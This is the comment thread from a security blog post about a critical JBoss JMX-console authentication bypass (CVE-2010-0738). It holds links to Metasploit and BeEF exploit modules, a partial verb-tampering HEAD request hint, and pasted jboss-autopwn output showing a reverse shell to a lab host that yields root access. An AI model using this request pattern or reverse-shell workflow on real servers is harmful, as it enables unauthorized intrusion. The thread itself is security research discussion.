Comments on IMQ Minded Security Blog: Good Bye Critical Jboss 0day

Giorgio Fedon, 2012-09-26T01:56:23.565-07:00
@Anonymous Thank you very much for that, that's one of the most comprehensive pieces of research about Jboss exploitation analysis.

Anonymous, 2012-09-21T15:07:42.672-07:00
www.matasano.com/research/OWASP3011_Luca.pdf Preso containing CVE-2010-0738 and other useful details on hacking JBoss

antisnatchor, 2011-10-21T05:16:30.410-07:00
The verb tampering security issue in the JMX console was also ported to BeEF many months ago (presented at CONFidence May 2011)

http://antisnatchor.com/JBoss_JMX_Deploy_Exploit

Cheers
Michele

mc, 2010-05-11T17:02:09.597-07:00
A metasploit module now exists to abuse the issue as well.

http://www.metasploit.com/redmine/projects/framework/repository/revisions/9285/entry/modules/exploits/multi/http/jboss_deploymentfilerepository.rb

Bill, 2010-05-10T14:07:39.092-07:00
Guys, I have been trying to reproduce this vulnerability in version 4.0.4 and I haven't had much luck!!! :( Any ideas...???

Minded Security, 2010-05-10T00:55:34.271-07:00
@Dennis You should ask the author (Christian Papathanasiou), we don't know when he'll release it.

Dennis, 2010-05-06T02:53:22.785-07:00
Is it possible to get a version of jboss-autopwn? Want to test our jboss servers

Giorgio Fedon, 2010-05-03T07:37:15.181-07:00
@Chris: Very happy to see this new addition to jboss-autopwn! :D

@Frank: We have developed a custom exploit that temporarily redirects the output to the Jboss status page, which is not password protected by default. This issue has been fixed with "CVE-2010-1429". During the next few days we will publish it on our website, along with the official advisory.

Chris, 2010-05-03T05:58:12.003-07:00
Got this working with JBoss-autopwn :-D

Screenshot below..

[root@foo jboss-autopwn]# ./jboss-autopwn 192.168.1.3 8080
[x] Checking if authentication is enabled..
[!] Authentication enabled!
[x] Proceeding to use CVE-2010-0738 JBoss /jmx-console authentication bypass
[!] Is this a *nix based or Windows based JBoss instance? nix
[!] Which IP should I send the reverse shell to? 192.168.1.2
[!] Which port should I send the reverse shell to? 6669
[x] *nix based selected...
Connection from 192.168.1.3 port 6669 [tcp/*] accepted
[!] you should now have a shell on 192.168.1.2:6669
[root@foo jboss-autopwn]# fg 1
nc -lv 6669
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
uname -a
Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
^C
[root@foo jboss-autopwn]#

Will be testing it some more and sending you guys a copy soon :-)

Christian Papathanasiou.

Frank D., 2010-04-30T23:55:15.022-07:00
It works. Anyway I cannot get response output, since HEAD method is without response body.

Do you have any hint for issuing a command to download JMX-Console configuration files?

Thank you

Giorgio Fedon, 2010-04-30T07:42:14.224-07:00
@Steve Thank you!

@Frank

just supply the request like this:

HEAD /jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.deployer%3Aserv.... HTTP/1.1

Use GET parameters, not POST ;D should work

Frank D., 2010-04-30T07:39:29.945-07:00
Hi guys.

We are trying to test the exploit but it doesn't work; any other hint?

Anonymous, 2010-04-30T07:37:37.488-07:00
Awesome work Guys!

Steve